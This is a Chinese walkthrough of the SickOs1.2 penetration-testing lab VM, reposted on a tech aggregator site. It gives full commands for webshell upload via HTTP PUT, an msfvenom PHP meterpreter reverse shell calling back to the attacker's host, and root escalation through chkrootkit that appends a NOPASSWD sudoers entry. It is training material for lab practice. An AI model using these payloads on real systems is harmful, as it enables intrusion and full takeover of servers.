IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> SickOs1.2 靶机渗透 -> 正文阅读

[系统运维]SickOs1.2 靶机渗透

靶机记录--9

目录

1.主机发现

2.端口扫描

3.版本信息,操作系统扫描?

4.漏洞查找及利用

1> 访问网站

2> 22端口尝试ssh登陆

3> 目录扫描

4>?查看该目录支持的方法

1>> nmap探测

2>> burp抓包探测

5> 写入一句话木马

6> 蚁剑连接

7> getshell?

1>>?将kali自带的反弹shell脚本复制出来

2>> 搞到蚁剑里来

3>> 访问反弹脚本

4>> getshell

8> 提权

1>> 先查看内核版本和系统版本?

2>> ls -la /etc/cron*

3>> chkrootkit(后门检测工具,存在于上面那个目录,就是会每天执行)

4>> 利用chkrootkit,添加当前用户www-data到sudoers列表中

提权成功

getshell方法二


1.主机发现

2.端口扫描

有开启22,80端口

3.版本信息,操作系统扫描?

OpenSSH 5.9p1

lighttpd 1.4.28

4.漏洞查找及利用

1> 访问网站

未发现可以利用的东西

2> 22端口尝试ssh登陆

?root/root 登陆成功。。。但是这不是练习目的

3> 目录扫描

找到一个类似上传文件目录的东西

4>?查看该目录支持的方法

1>> nmap探测

nmap --script=http-methods --script-args http-methods.url-path=test 192.168.129.223

可以看到,该目录支持PUT方法

2>> burp抓包探测

还可以用options 去探测其支持的方法

5> 写入一句话木马

直接就在上面那个包里修改,,201 创建成功

6> 蚁剑连接

7> getshell?

1>>?将kali自带的反弹shell脚本复制出来

2>> 搞到蚁剑里来

修改ip+端口(有限制,用443)

3>> 访问反弹脚本

?

4>> getshell

kali这边提前监听

8> 提权

1>> 先查看内核版本和系统版本?

2>> ls -la /etc/cron*

?在/etc/cron.daily 目录下,创建脚本chmod +x 给与执行权限,每天会自动执行

3>> chkrootkit(后门检测工具,存在于上面那个目录,就是会每天执行)

找到 chkrootkit 存在本地提权漏洞

看一下那个txt文件

?里面大概意思就是,会定期以root身份执行/tmp/update文件

4>> 利用chkrootkit,添加当前用户www-data到sudoers列表中

/etc/sudoers 该文件允许特定用户像root用户一样使用各种各样的命令,而不需要root用户的密码

echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers' > /tmp/update

提权成功


getshell方法二

1>?利用msfvenom生成一个php木马

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.129.129 LPORT=443?-f raw > shell.php

2> 然后将其传到靶机

curl -v -H 'Expect:' -T shell.php "http://192.168.129.223/test/"

3> 在msf上开启监听

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.129.129
set lport 443
exploit -j
sudo netstat -plnt

4> 访问上传的脚本

5> 然后msf这里

session -i 1

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2021-11-10 12:49:03  更:2021-11-10 12:50:02 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 22:31:18-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码